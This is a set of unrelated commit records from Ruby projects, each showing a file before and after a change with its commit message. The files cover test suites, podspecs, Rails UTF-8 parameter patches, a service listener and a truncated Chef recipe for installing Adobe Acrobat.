assert_equal({changelist1=>[path1]}, yield(ctx, changelist1))
assert_equal({changelist2=>[path2]}, yield(ctx, changelist2))
assert_equal({changelist1=>[path1]}, yield(ctx, [changelist1]))
assert_equal({changelist2=>[path2]}, yield(ctx, [changelist2]))
assert_equal({changelist1=>[path1],changelist2=>[path2],nil=>[@wc_path]}, yield(ctx, nil))
assert_equal({}, yield(ctx, []))
assert_equal({changelist1=>[path1],changelist2=>[path2]},
yield(ctx, [changelist1,changelist2]))
ctx.remove_from_changelists(nil, [path1, path2])
assert_equal({}, yield(ctx, changelist1))
assert_equal({}, yield(ctx, changelist2))
end
def test_changelists_get_without_block
assert_changelists do |ctx, changelist_name|
ctx.changelists(changelist_name, @wc_path)
end
end
def test_changelists_get_with_block
assert_changelists do |ctx, changelist_name|
changelists = Hash.new{|h,k| h[k]=[]}
ctx.changelists(changelist_name, @wc_path) do |path,cl_name|
changelists[cl_name] << path
end
changelists
end
end
end
|
#
# Be sure to run `pod lib lint UYEditor.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = "UYEditor"
s.version = "0.3.5"
s.summary = "UYEditor"
s.description = <<-DESC
#UYEditor
DESC
s.homepage = "https://github.com/youyuedu/UYEditor"
s.license = 'MIT'
s.author = { "winddpan" => "winddpan@126.com" }
s.source = { :git => "https://github.com/youyuedu/UYEditor.git", :tag => s.version.to_s }
s.platform = :ios, '7.0'
s.requires_arc = true
s.resources = 'iOS/HTML/*', 'iOS/UYEditor.xcassets'
s.source_files = 'iOS/Source/*'
s.frameworks = 'UIKit', 'Foundation'
end
update source_files
#
# Be sure to run `pod lib lint UYEditor.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = "UYEditor"
s.version = "0.3.5"
s.summary = "UYEditor"
s.description = <<-DESC
#UYEditor
DESC
s.homepage = "https://github.com/youyuedu/UYEditor"
s.license = 'MIT'
s.author = { "winddpan" => "winddpan@126.com" }
s.source = { :git => "https://github.com/youyuedu/UYEditor.git", :tag => s.version.to_s }
s.platform = :ios, '7.0'
s.requires_arc = true
s.resources = 'iOS/HTML/*', 'iOS/UYEditor.xcassets'
s.source_files = 'iOS/Source/**/*.{h,m}'
s.frameworks = 'UIKit', 'Foundation'
end
|
require 'test_helper'
class SerializedAttributeTest < ActiveSupport::TestCase
context "A model with a serialized attribute" do
setup do
@extract_code = 'Post.limit(1)'
@extract_name = :posts_with_serialized_thing
end
context ".extract" do
setup do
FeTestEnv.setup
end
teardown do
FeTestEnv.teardown
end
should "extract the .dump() value of the serialized attribute" do
Fe.extract(@extract_code, :name => @extract_name)
Fe.load_db(@extract_name)
assert_nothing_raised do
Post.first.serialized_thing
end
end
end
end
end
Tweaked the test case to be more specific, it wasn't testing against the .loaded db (fake_test), it was both extracting and loading from the same db before, which doesn't cover how the tool would be operating in the real world
require 'test_helper'
class SerializedAttributeTest < ActiveSupport::TestCase
context "A model with a serialized attribute" do
setup do
@extract_code = 'Post.limit(1)'
@extract_name = :posts_with_serialized_thing
end
context ".extract and .load_db with serialized attributes" do
setup do
FeTestEnv.setup
Fe.extract(@extract_code, :name => @extract_name)
FeTestEnv.the_env = 'fake_test'
FeTestEnv.recreate_schema_without_data
end
teardown do
FeTestEnv.teardown
end
should "extract the .dump() value of the serialized attribute" do
Fe.load_db(@extract_name)
if Post.count == 0
raise "The test setup didn't work, Post.count should have some rows"
end
assert_kind_of ComplexThing, Post.first.serialized_thing
end
end
end
end
|
# ruby pre-2.0 compatibility fixes
if RUBY_VERSION < '2.0'
# see https://bugs.ruby-lang.org/issues/7547
# the fix was only applied in 2.0
module Dir::Tmpname
def create(basename, *rest)
if opts = Hash.try_convert(rest[-1])
opts = opts.dup if rest.pop.equal?(opts)
max_try = opts.delete(:max_try)
opts = [opts]
else
opts = []
end
tmpdir, = *rest
if $SAFE > 0 and tmpdir.tainted?
tmpdir = '/tmp'
else
tmpdir ||= tmpdir()
end
n = nil
begin
path = File.join(tmpdir, make_tmpname(basename, n))
yield(path, n, *opts)
rescue Errno::EEXIST
n ||= 0
n += 1
retry if !max_try or n < max_try
raise "cannot generate temporary name using `#{basename}' under `#{tmpdir}'"
end
path
end
end
end
# This makes it so all parameters get converted to UTF-8 before they hit your
# app. If someone sends invalid UTF-8 to your server, raise an exception.
class ActionController::InvalidByteSequenceErrorFromParams < Encoding::InvalidByteSequenceError; end
class ActionController::Base
def force_utf8_params
traverse = lambda do |object, block|
if object.kind_of?(Hash)
object.each_value { |o| traverse.call(o, block) }
elsif object.kind_of?(Array)
object.each { |o| traverse.call(o, block) }
else
block.call(object)
end
object
end
force_encoding = lambda do |o|
if o.respond_to?(:force_encoding)
o.force_encoding(Encoding::UTF_8)
raise ActionController::InvalidByteSequenceErrorFromParams unless o.valid_encoding?
end
if o.respond_to?(:original_filename) && o.original_filename
o.original_filename.force_encoding(Encoding::UTF_8)
raise ActionController::InvalidByteSequenceErrorFromParams unless o.original_filename.valid_encoding?
end
end
traverse.call(params, force_encoding)
path_str = request.path.to_s
if path_str.respond_to?(:force_encoding)
path_str.force_encoding(Encoding::UTF_8)
raise ActionController::InvalidByteSequenceErrorFromParams unless path_str.valid_encoding?
end
end
before_filter :force_utf8_params
end
# Fix for https://bugs.ruby-lang.org/issues/7278 , which was filling up our logs with these warnings
if RUBY_VERSION < "2."
require 'net/protocol'
class Net::InternetMessageIO
def each_crlf_line(src)
buffer_filling(@wbuf, src) do
while line = @wbuf.slice!(/\A[^\r\n]*(?:\n|\r(?:\n|(?!\z)))/)
yield line.chomp("\n") + "\r\n"
end
end
end
end
end
alias Utf8SafeYAMLColumn to YAMLColumn for unmarshalling
Change-Id: I3aeea850b7d39fd476e887ea3f4dbf90d143ce58
Reviewed-on: https://gerrit.instructure.com/77844
Reviewed-by: Cody Cutrer <c4fe2b1d90ef8f2548c8aeabfa633434316f0305@instructure.com>
Tested-by: Jenkins
Product-Review: James Williams <3a5f4ed991dbfa5c9ef76ad729d240ca12f62180@instructure.com>
QA-Review: James Williams <3a5f4ed991dbfa5c9ef76ad729d240ca12f62180@instructure.com>
# ruby pre-2.0 compatibility fixes
if RUBY_VERSION < '2.0'
# see https://bugs.ruby-lang.org/issues/7547
# the fix was only applied in 2.0
module Dir::Tmpname
def create(basename, *rest)
if opts = Hash.try_convert(rest[-1])
opts = opts.dup if rest.pop.equal?(opts)
max_try = opts.delete(:max_try)
opts = [opts]
else
opts = []
end
tmpdir, = *rest
if $SAFE > 0 and tmpdir.tainted?
tmpdir = '/tmp'
else
tmpdir ||= tmpdir()
end
n = nil
begin
path = File.join(tmpdir, make_tmpname(basename, n))
yield(path, n, *opts)
rescue Errno::EEXIST
n ||= 0
n += 1
retry if !max_try or n < max_try
raise "cannot generate temporary name using `#{basename}' under `#{tmpdir}'"
end
path
end
end
end
# This makes it so all parameters get converted to UTF-8 before they hit your
# app. If someone sends invalid UTF-8 to your server, raise an exception.
class ActionController::InvalidByteSequenceErrorFromParams < Encoding::InvalidByteSequenceError; end
class ActionController::Base
def force_utf8_params
traverse = lambda do |object, block|
if object.kind_of?(Hash)
object.each_value { |o| traverse.call(o, block) }
elsif object.kind_of?(Array)
object.each { |o| traverse.call(o, block) }
else
block.call(object)
end
object
end
force_encoding = lambda do |o|
if o.respond_to?(:force_encoding)
o.force_encoding(Encoding::UTF_8)
raise ActionController::InvalidByteSequenceErrorFromParams unless o.valid_encoding?
end
if o.respond_to?(:original_filename) && o.original_filename
o.original_filename.force_encoding(Encoding::UTF_8)
raise ActionController::InvalidByteSequenceErrorFromParams unless o.original_filename.valid_encoding?
end
end
traverse.call(params, force_encoding)
path_str = request.path.to_s
if path_str.respond_to?(:force_encoding)
path_str.force_encoding(Encoding::UTF_8)
raise ActionController::InvalidByteSequenceErrorFromParams unless path_str.valid_encoding?
end
end
before_filter :force_utf8_params
end
module ActiveRecord::Coders
Utf8SafeYAMLColumn = YAMLColumn
end
# Fix for https://bugs.ruby-lang.org/issues/7278 , which was filling up our logs with these warnings
if RUBY_VERSION < "2."
require 'net/protocol'
class Net::InternetMessageIO
def each_crlf_line(src)
buffer_filling(@wbuf, src) do
while line = @wbuf.slice!(/\A[^\r\n]*(?:\n|\r(?:\n|(?!\z)))/)
yield line.chomp("\n") + "\r\n"
end
end
end
end
end
|
module ServiceListeners
class AttachmentReplacementIdUpdater
include Rails.application.routes.url_helpers
include PublicDocumentRoutesHelper
attr_reader :attachment_data, :queue
def initialize(attachment_data, queue: nil)
@attachment_data = attachment_data
@queue = queue
end
def update!
return unless attachment_data.present?
return unless attachment_data.replaced_by.present?
worker.perform_async(attachment_data.id)
end
private
def worker
worker = AssetManagerAttachmentReplacementIdUpdateWorker
queue.present? ? worker.set(queue: queue) : worker
end
end
end
Remove unused includes in AttachmentReplacementIdUpdater
Methods from these helpers are not used in this class.
module ServiceListeners
class AttachmentReplacementIdUpdater
attr_reader :attachment_data, :queue
def initialize(attachment_data, queue: nil)
@attachment_data = attachment_data
@queue = queue
end
def update!
return unless attachment_data.present?
return unless attachment_data.replaced_by.present?
worker.perform_async(attachment_data.id)
end
private
def worker
worker = AssetManagerAttachmentReplacementIdUpdateWorker
queue.present? ? worker.set(queue: queue) : worker
end
end
end
|
class TestYaoResouce < Test::Unit::TestCase
include AuthStub
def setup
initialize_test_client!
end
private
# Yao::Resources::* のテストで Yao.default.pool の設定を都度都度 記述しなくていいよういするヘルパー
# endpoint の URL がマチマチだとテストを記述するのが面倒なので example.com で統一している
def initialize_test_client!
auth_url = "http://example.com:12345"
username = "yao"
tenant = "default"
password = "password"
stub_auth_request(auth_url, username, password, tenant)
Yao.config.set :auth_url, auth_url
Yao::Auth.new(tenant_name: tenant, username: username, password: password)
client = Yao::Client.gen_client("https://example.com:12345")
Yao.default_client.admin_pool["identity"] = client
Yao.default_client.pool["network"] = client
Yao.default_client.pool["compute"] = client
Yao.default_client.pool["metering"] = client
end
end
TestYaoResouce#teardown で Yao.default_client をリセットして、他のテストに副作用を出さないようにする
class TestYaoResouce < Test::Unit::TestCase
include AuthStub
def setup
initialize_test_client!
end
def teardown
reset_test_client!
end
private
# Yao::Resources::* のテストで Yao.default.pool の設定を都度都度 記述しなくていいよういするヘルパー
# endpoint の URL がマチマチだとテストを記述するのが面倒なので example.com で統一している
def initialize_test_client!
auth_url = "http://example.com:12345"
username = "yao"
tenant = "default"
password = "password"
stub_auth_request(auth_url, username, password, tenant)
Yao.config.set :auth_url, auth_url
Yao::Auth.new(tenant_name: tenant, username: username, password: password)
client = Yao::Client.gen_client("https://example.com:12345")
Yao.default_client.admin_pool["identity"] = client
Yao.default_client.pool["network"] = client
Yao.default_client.pool["compute"] = client
Yao.default_client.pool["metering"] = client
end
# 他のテストで副作用を出さないように Yao::Client.default_client を nil でリセットしておきますa
def reset_test_client!
Yao::Client.default_client = nil
end
end
|
class TestYaoResouce < Test::Unit::TestCase
include AuthStub
def setup
initialize_test_client!
end
def teardown
reset_test_client!
end
private
# Yao::Resources::* のテストで Yao.default.pool の設定を都度都度 記述しなくていいよういするヘルパー
# endpoint の URL がマチマチだとテストを記述するのが面倒なので example.com で統一している
def initialize_test_client!
auth_url = "http://example.com:12345"
username = "yao"
tenant = "default"
password = "password"
stub_auth_request(auth_url, username, password, tenant)
Yao.config.set :auth_url, auth_url
Yao::Auth.new(tenant_name: tenant, username: username, password: password)
client = Yao::Client.gen_client("https://example.com:12345")
Yao.default_client.admin_pool["identity"] = client
Yao.default_client.pool["network"] = client
Yao.default_client.pool["compute"] = client
Yao.default_client.pool["metering"] = client
end
# 他のテストで副作用を出さないように Yao::Client.default_client, Yao::Conig を nil でリセットしておきます
def reset_test_client!
Yao::Client.default_client = nil
Yao::Config::HOOK_RENEW_CLIENT_KEYS.each do |key|
Yao.configure do
set key, nil
end
end
end
end
Yao::Resources::* のテストで stub_request を使うと状態を持ってしまい、別のテストに副作用を出す
各テストの teardown で WebMock.reset! して防ぐ
class TestYaoResouce < Test::Unit::TestCase
include AuthStub
def setup
initialize_test_client!
end
def teardown
reset_test_client!
end
private
# Yao::Resources::* のテストで Yao.default.pool の設定を都度都度 記述しなくていいよういするヘルパー
# endpoint の URL がマチマチだとテストを記述するのが面倒なので example.com で統一している
def initialize_test_client!
auth_url = "http://example.com:12345"
username = "yao"
tenant = "default"
password = "password"
stub_auth_request(auth_url, username, password, tenant)
Yao.config.set :auth_url, auth_url
Yao::Auth.new(tenant_name: tenant, username: username, password: password)
client = Yao::Client.gen_client("https://example.com:12345")
Yao.default_client.admin_pool["identity"] = client
Yao.default_client.pool["network"] = client
Yao.default_client.pool["compute"] = client
Yao.default_client.pool["metering"] = client
end
# 他のテストで副作用を出さないように Yao::Client.default_client, Yao::Conig を nil でリセットしておきます
def reset_test_client!
Yao::Client.default_client = nil
Yao::Config::HOOK_RENEW_CLIENT_KEYS.each do |key|
Yao.configure do
set key, nil
end
end
# https://github.com/bblimke/webmock/wiki/Clear-stubs-and-request-history
# 他のテストに作用しないように stub_request を reset する
WebMock.reset!
end
end
|
require 'rails_helper'
describe "Route", type: :feature do
it "should show the route form when you click the route button", js: true do
visit root_path
page.evaluate_script("$('.ion-merge').click()")
expect(page).to have_content('Trajetos')
end
it "should calculate the route", js: true do
Capybara.raise_server_errors = false
visit root_path
page.evaluate_script("$('.ion-merge').click()")
within("#sidebar form") do
fill_in 'route[origin]', with: '-15.76528581775335, -47.866482138633735'
fill_in 'route[destination]', with: '-15.766824273744168, -47.867302894592285'
end
click_button 'Obter Trajeto'
expect(page).to have_content('You have arrived at your destination.')
end
it "should swap locations of the route", js: true do
visit root_path
page.evaluate_script("$('.ion-merge').click()")
origin = '-15.76528581775335, -47.866482138633735'
destination = '-15.766824273744168, -47.867302894592285'
within("#sidebar form") do
fill_in 'route[origin]', with: origin
fill_in 'route[destination]', with: destination
find('.btn-reverse-route').click
end
expect(page).to have_field('route[origin]', with: destination)
expect(page).to have_field('route[destination]', with: origin)
end
end
Adding acceptance tests, to test route modes.
require 'rails_helper'
describe "Route", type: :feature do
it "should show the route form when you click the route button", js: true do
visit root_path
page.evaluate_script("$('.ion-merge').click()")
expect(page).to have_content('Trajetos')
end
it "should swap locations of the route", js: true do
visit root_path
page.evaluate_script("$('.ion-merge').click()")
origin = '-15.76528581775335, -47.866482138633735'
destination = '-15.766824273744168, -47.867302894592285'
within("#sidebar form") do
fill_in 'route[origin]', with: origin
fill_in 'route[destination]', with: destination
find('.btn-reverse-route').click
end
expect(page).to have_field('route[origin]', with: destination)
expect(page).to have_field('route[destination]', with: origin)
end
context "Calculate the route" do
before(:each) do
Capybara.raise_server_errors = false
visit root_path
page.evaluate_script("$('.ion-merge').click()")
within("#sidebar form") do
fill_in 'route[origin]', with: '-15.76528581775335, -47.866482138633735'
fill_in 'route[destination]', with: '-15.766824273744168, -47.867302894592285'
end
end
it "should calculate the route for pedestrian", js: true do
within("#sidebar form") do
page.all('label.btn.btn-outline-info')[0].click
click_button 'Obter Trajeto'
end
expect(find('#mode_text')).to have_content('A pé')
expect(page).to have_content('You have arrived at your destination.')
end
it "should calculate the route for bicycle", js: true do
within("#sidebar form") do
page.all('label.btn.btn-outline-info')[1].click
click_button 'Obter Trajeto'
end
expect(find('#mode_text')).to have_content('Bicicleta')
expect(page).to have_content('You have arrived at your destination.')
end
it "should calculate the route for car", js: true do
within("#sidebar form") do
page.all('label.btn.btn-outline-info')[2].click
click_button 'Obter Trajeto'
end
expect(find('#mode_text')).to have_content('Carro')
expect(page).to have_content('You have arrived at your destination.')
end
end
context "Context Menu" do
it "should show context menu when right click the map", js: true do
visit root_path
tiles_origin = page.evaluate_script('$(".leaflet-tile").eq(3).trigger("contextmenu")')
tiles_destination = page.evaluate_script('$(".leaflet-tile").eq(4)')
#puts tiles_origin
#puts tiles_destination
#page.evaluate_script('$("#map").trigger("contextmenu")')
##puts page.evaluate_script('$(".leaflet-contextmenu").html()')
#expect(page).to have_content('Rotas a partir daqui')
page.save_screenshot
end
end
end
|
Remove period
|
require_relative "test_helper"
require 'timecop'
class TestTimecopWithoutDate < Minitest::Test
def setup
Object.send(:remove_const, :Date) if Object.const_defined?(:Date)
Object.send(:remove_const, :DateTime) if Object.const_defined?(:DateTime)
end
# just in case...let's really make sure that Timecop is disabled between tests...
def teardown
Timecop.return
end
def test_freeze_changes_and_resets_time
# depending on how we're invoked (individually or via the rake test suite)
assert !Time.respond_to?(:zone) || Time.zone.nil?
t = Time.local(2008, 10, 10, 10, 10, 10)
assert t != Time.now
Timecop.freeze(2008, 10, 10, 10, 10, 10) do
assert_equal t, Time.now
end
assert t != Time.now
end
def test_recursive_freeze
t = Time.local(2008, 10, 10, 10, 10, 10)
Timecop.freeze(2008, 10, 10, 10, 10, 10) do
assert_equal t, Time.now
t2 = Time.local(2008, 9, 9, 9, 9, 9)
Timecop.freeze(2008, 9, 9, 9, 9, 9) do
assert_equal t2, Time.now
end
assert_equal t, Time.now
end
assert_nil Time.send(:mock_time)
end
def test_exception_thrown_in_freeze_block_properly_resets_time
t = Time.local(2008, 10, 10, 10, 10, 10)
begin
Timecop.freeze(t) do
assert_equal t, Time.now
raise "blah exception"
end
rescue
assert t != Time.now
assert_nil Time.send(:mock_time)
end
end
def test_freeze_freezes_time
t = Time.local(2008, 10, 10, 10, 10, 10)
now = Time.now
Timecop.freeze(t) do
sleep(0.25)
assert Time.now < now, "If we had failed to freeze, time would have proceeded, which is what appears to have happened."
new_t = Time.now
assert_equal t, new_t, "Failed to change move time." # 2 seconds
assert_equal new_t, Time.now
end
end
def test_travel_keeps_time_moving
t = Time.local(2008, 10, 10, 10, 10, 10)
now = Time.now
Timecop.travel(t) do
new_now = Time.now
assert_times_effectively_equal new_now, t, 1, "Looks like we failed to actually travel time" # 0.1 seconds
sleep(0.25)
assert_times_effectively_not_equal new_now, Time.now, 0.25, "Looks like time is not moving"
end
end
def test_recursive_travel_maintains_each_context
t = Time.local(2008, 10, 10, 10, 10, 10)
Timecop.travel(2008, 10, 10, 10, 10, 10) do
assert((t - Time.now).abs < 50, "Failed to travel time.")
t2 = Time.local(2008, 9, 9, 9, 9, 9)
Timecop.travel(2008, 9, 9, 9, 9, 9) do
assert_times_effectively_equal(t2, Time.now, 1, "Failed to travel time.")
assert_times_effectively_not_equal(t, Time.now, 1000, "Failed to travel time.")
end
assert_times_effectively_equal(t, Time.now, 2, "Failed to restore previously-traveled time.")
end
assert_nil Time.send(:mock_time)
end
def test_recursive_travel_then_freeze
t = Time.local(2008, 10, 10, 10, 10, 10)
Timecop.travel(2008, 10, 10, 10, 10, 10) do
assert((t - Time.now).abs < 50, "Failed to travel time.")
t2 = Time.local(2008, 9, 9, 9, 9, 9)
Timecop.freeze(2008, 9, 9, 9, 9, 9) do
assert_equal t2, Time.now
end
assert_times_effectively_equal(t, Time.now, 2, "Failed to restore previously-traveled time.")
end
assert_nil Time.send(:mock_time)
end
def test_recursive_freeze_then_travel
t = Time.local(2008, 10, 10, 10, 10, 10)
Timecop.freeze(t) do
assert_equal t, Time.now
t2 = Time.local(2008, 9, 9, 9, 9, 9)
Timecop.travel(t2) do
assert_times_effectively_equal(t2, Time.now, 1, "Failed to travel time.")
assert_times_effectively_not_equal(t, Time.now, 1000, "Failed to travel time.")
end
assert_equal t, Time.now
end
assert_nil Time.send(:mock_time)
end
end
fixed test intermittently failing in jruby
require_relative "test_helper"
require 'timecop'
class TestTimecopWithoutDate < Minitest::Test
def setup
Object.send(:remove_const, :Date) if Object.const_defined?(:Date)
Object.send(:remove_const, :DateTime) if Object.const_defined?(:DateTime)
end
# just in case...let's really make sure that Timecop is disabled between tests...
def teardown
Timecop.return
end
def test_freeze_changes_and_resets_time
# depending on how we're invoked (individually or via the rake test suite)
assert !Time.respond_to?(:zone) || Time.zone.nil?
t = Time.local(2008, 10, 10, 10, 10, 10)
assert t != Time.now
Timecop.freeze(2008, 10, 10, 10, 10, 10) do
assert_equal t, Time.now
end
assert t != Time.now
end
def test_recursive_freeze
t = Time.local(2008, 10, 10, 10, 10, 10)
Timecop.freeze(2008, 10, 10, 10, 10, 10) do
assert_equal t, Time.now
t2 = Time.local(2008, 9, 9, 9, 9, 9)
Timecop.freeze(2008, 9, 9, 9, 9, 9) do
assert_equal t2, Time.now
end
assert_equal t, Time.now
end
assert_nil Time.send(:mock_time)
end
def test_exception_thrown_in_freeze_block_properly_resets_time
t = Time.local(2008, 10, 10, 10, 10, 10)
begin
Timecop.freeze(t) do
assert_equal t, Time.now
raise "blah exception"
end
rescue
assert t != Time.now
assert_nil Time.send(:mock_time)
end
end
def test_freeze_freezes_time
t = Time.local(2008, 10, 10, 10, 10, 10)
now = Time.now
Timecop.freeze(t) do
sleep(0.25)
assert Time.now < now, "If we had failed to freeze, time would have proceeded, which is what appears to have happened."
new_t = Time.now
assert_equal t, new_t, "Failed to change move time." # 2 seconds
assert_equal new_t, Time.now
end
end
def test_travel_keeps_time_moving
t = Time.local(2008, 10, 10, 10, 10, 10)
now = Time.now
Timecop.travel(t) do
new_now = Time.now
assert_times_effectively_equal new_now, t, 1, "Looks like we failed to actually travel time" # 0.1 seconds
sleep(0.25)
assert_times_effectively_not_equal new_now, Time.now, 0.24, "Looks like time is not moving"
end
end
def test_recursive_travel_maintains_each_context
t = Time.local(2008, 10, 10, 10, 10, 10)
Timecop.travel(2008, 10, 10, 10, 10, 10) do
assert((t - Time.now).abs < 50, "Failed to travel time.")
t2 = Time.local(2008, 9, 9, 9, 9, 9)
Timecop.travel(2008, 9, 9, 9, 9, 9) do
assert_times_effectively_equal(t2, Time.now, 1, "Failed to travel time.")
assert_times_effectively_not_equal(t, Time.now, 1000, "Failed to travel time.")
end
assert_times_effectively_equal(t, Time.now, 2, "Failed to restore previously-traveled time.")
end
assert_nil Time.send(:mock_time)
end
def test_recursive_travel_then_freeze
t = Time.local(2008, 10, 10, 10, 10, 10)
Timecop.travel(2008, 10, 10, 10, 10, 10) do
assert((t - Time.now).abs < 50, "Failed to travel time.")
t2 = Time.local(2008, 9, 9, 9, 9, 9)
Timecop.freeze(2008, 9, 9, 9, 9, 9) do
assert_equal t2, Time.now
end
assert_times_effectively_equal(t, Time.now, 2, "Failed to restore previously-traveled time.")
end
assert_nil Time.send(:mock_time)
end
def test_recursive_freeze_then_travel
t = Time.local(2008, 10, 10, 10, 10, 10)
Timecop.freeze(t) do
assert_equal t, Time.now
t2 = Time.local(2008, 9, 9, 9, 9, 9)
Timecop.travel(t2) do
assert_times_effectively_equal(t2, Time.now, 1, "Failed to travel time.")
assert_times_effectively_not_equal(t, Time.now, 1000, "Failed to travel time.")
end
assert_equal t, Time.now
end
assert_nil Time.send(:mock_time)
end
end
|
Pod::Spec.new do |s|
s.name = 'TTTRandomizedEnumerator'
s.version = '0.0.1'
s.license = 'MIT'
s.summary = 'Mix things up in your collection classes with style and class (well, a category, but you get the idea).'
s.homepage = 'https://github.com/mattt/TTTRandomizedEnumerator'
s.authors = { 'Mattt Thompson' => 'm@mattt.me' }
s.source = { :git => 'https://github.com/mattt/TTTRandomizedEnumerator.git', :tag => '0.0.1' }
s.source_files = 'TTTRandomizedEnumerator'
s.requires_arc = true
end
Bumping version to 0.0.2
Pod::Spec.new do |s|
s.name = 'TTTRandomizedEnumerator'
s.version = '0.0.2'
s.license = 'MIT'
s.summary = 'Mix things up in your collection classes with style and class (well, a category, but you get the idea).'
s.homepage = 'https://github.com/mattt/TTTRandomizedEnumerator'
s.authors = { 'Mattt Thompson' => 'm@mattt.me' }
s.source = { :git => 'https://github.com/mattt/TTTRandomizedEnumerator.git', :tag => '0.0.2' }
s.source_files = 'TTTRandomizedEnumerator'
s.requires_arc = true
end
|
require "minitest/autorun"
require "csrmatrix"
class PropertiesTest < Minitest::Test
def setup
@matrix = TwoDMatrix.new
@matrixDense3x3 = TwoDMatrix.new
@matrixDense3x3.build_from_array([[1, 2, 3], [1, 2, 3], [1, 2, 3]])
@matrixSparse3x3 = TwoDMatrix.new
@matrixSparse3x3.build_from_array([[0, 1, 0], [2, 0, 0], [0, 0, 3]])
@matrixTrigonal3x3 = TwoDMatrix.new
@matrixTrigonal3x3.build_from_array([[-1, 0, 0], [0, -1, 0], [0, 0, -1]])
@matrixEmpty3x3 = TwoDMatrix.new
@matrixEmpty3x3.build_from_array([[],[],[]])
@matrixZero3x3 = TwoDMatrix.new
@matrixZero3x3.build_from_array([[0, 0, 0], [0, 0, 0], [0, 0, 0]])
#@matrixHermitian3x3 = TwoDMatrix.new
#@matrixHermitian3x3.build_from_array([[2, 2+i, 4], [2-i, 3, i], [4, -i, 1]])
end
def test_index
assert_equal 1, @matrixDense3x3.index(1) # first nonzero? entry
end
def test_twod_index
assert_equal 2, @matrixDense3x3.index(2, 1) # row 2 column 1
end
def test_invalid_index
assert_raises(CsrMatrix::Exceptions::IndexOutOfRangeException) { @matrixDense3x3.index(10) }
assert_raises(CsrMatrix::Exceptions::IndexOutOfRangeException) { @matrixDense3x3.index(4, 3) }
end
def test_diagonal
assert @matrixTrigonal3x3.diagonal?
end
def test_empty
assert @matrixEmpty3x3.empty?
end
def test_hermitian
# FIXME: no imaginary character construction yet
# assert @matrixHermitian3x3.hermitian()
end
def test_lower_triangle
assert @matrixTrigonal3x3.lower_triangular?
end
def test_normal
assert !@matrixSparse3x3.normal?
end
def test_orthogonal
assert @matrixTrigonal3x3.orthogonal?
end
def test_permutation
assert !@matrixSparse3x3.permutation?
end
def test_real
assert @matrixSparse3x3.real?
end
def test_nonsingular
assert @matrixTrigonal3x3.nonsingular?
end
def test_singular
assert @matrixDense3x3.singular?
end
def test_square
assert @matrixDense3x3.square?
end
def test_symmetric
assert @matrixTrigonal3x3.symmetric?
end
def test_unitary
assert @matrixTrigonal3x3.unitary?
end
def test_upper_triangle
assert @matrixTrigonal3x3.symmetric?
end
def test_zero
assert @matrixZero3x3.zero?
end
end
Added invalid tests to check non square properties.
require "minitest/autorun"
require "csrmatrix"
class PropertiesTest < Minitest::Test
def setup
@matrix = TwoDMatrix.new
@matrixDense3x3 = TwoDMatrix.new
@matrixDense3x3.build_from_array([[1, 2, 3], [1, 2, 3], [1, 2, 3]])
@matrixNotSquare2x3 = TwoDMatrix.new
@matrixNotSquare2x3.build_from_array([[1, 2], [1, 2], [1, 2]])
@matrixSparse3x3 = TwoDMatrix.new
@matrixSparse3x3.build_from_array([[0, 1, 0], [2, 0, 0], [0, 0, 3]])
@matrixTrigonal3x3 = TwoDMatrix.new
@matrixTrigonal3x3.build_from_array([[-1, 0, 0], [0, -1, 0], [0, 0, -1]])
@matrixEmpty3x3 = TwoDMatrix.new
@matrixEmpty3x3.build_from_array([[],[],[]])
@matrixZero3x3 = TwoDMatrix.new
@matrixZero3x3.build_from_array([[0, 0, 0], [0, 0, 0], [0, 0, 0]])
#@matrixHermitian3x3 = TwoDMatrix.new
#@matrixHermitian3x3.build_from_array([[2, 2+i, 4], [2-i, 3, i], [4, -i, 1]])
end
def test_index
assert_equal 1, @matrixDense3x3.index(1) # first nonzero? entry
end
def test_twod_index
assert_equal 2, @matrixDense3x3.index(2, 1) # row 2 column 1
end
def test_invalid_index
assert_raises(CsrMatrix::Exceptions::IndexOutOfRangeException) { @matrixDense3x3.index(10) }
assert_raises(CsrMatrix::Exceptions::IndexOutOfRangeException) { @matrixDense3x3.index(4, 3) }
end
def test_diagonal
assert @matrixTrigonal3x3.diagonal?
end
def test_empty
assert @matrixEmpty3x3.empty?
end
def test_hermitian
# FIXME: no imaginary character construction yet
# assert @matrixHermitian3x3.hermitian()
end
def test_lower_triangle
assert @matrixTrigonal3x3.lower_triangular?
end
def test_normal
assert !@matrixSparse3x3.normal?
end
def test_invalid_normal
assert_raises(CsrMatrix::Exceptions::MatrixDimException) { @matrixNotSquare2x3.normal? }
end
def test_orthogonal
assert @matrixTrigonal3x3.orthogonal?
end
def test_invalid_orthogonal
assert_raises(CsrMatrix::Exceptions::MatrixDimException) { @matrixNotSquare2x3.orthogonal? }
end
def test_permutation
assert !@matrixSparse3x3.permutation?
end
def test_invalid_permutation
assert_raises(CsrMatrix::Exceptions::MatrixDimException) { @matrixNotSquare2x3.permutation? }
end
def test_real
assert @matrixSparse3x3.real?
end
def test_nonsingular
assert @matrixTrigonal3x3.nonsingular?
end
def test_singular
assert @matrixDense3x3.singular?
end
def test_square
assert @matrixDense3x3.square?
end
def test_symmetric
assert @matrixTrigonal3x3.symmetric?
end
def test_invalid_symmetric
assert_raises(CsrMatrix::Exceptions::MatrixDimException) { @matrixNotSquare2x3.symmetric? }
end
def test_unitary
assert @matrixTrigonal3x3.unitary?
end
def test_invalid_unitary
assert_raises(CsrMatrix::Exceptions::MatrixDimException) { @matrixNotSquare2x3.unitary? }
end
def test_upper_triangle
assert @matrixTrigonal3x3.symmetric?
end
def test_zero
assert @matrixZero3x3.zero?
end
end
|
#
# Cookbook Name:: adobe_acrobat_pro_xi
# Recipe:: mac
#
# Copyright 2014, Wesleyan University
#
# All rights reserved - Do Not Redistribute
#
# Install base package
dmg_package "Adobe Acrobat Pro" do
app "adobe_acrobat_pro_xi-11.0"
volumes_dir "adobe_acrobat_pro_xi-11.0"
dmg_name "adobe_acrobat_pro_xi-11.0"
source "http://ims-chef.wesleyan.edu/os_x/adobe_acrobat_pro_xi/adobe_acrobat_pro_xi-11.0.dmg"
checksum "ad64d83138a3c9ad74b41617f5a3b3e55470f3115806768576ebcc07c94e8822"
action :install
type "pkg"
package_id "com.adobe.acrobat.11.viewer.app.pkg.MUI"
end
# Install latest point release update
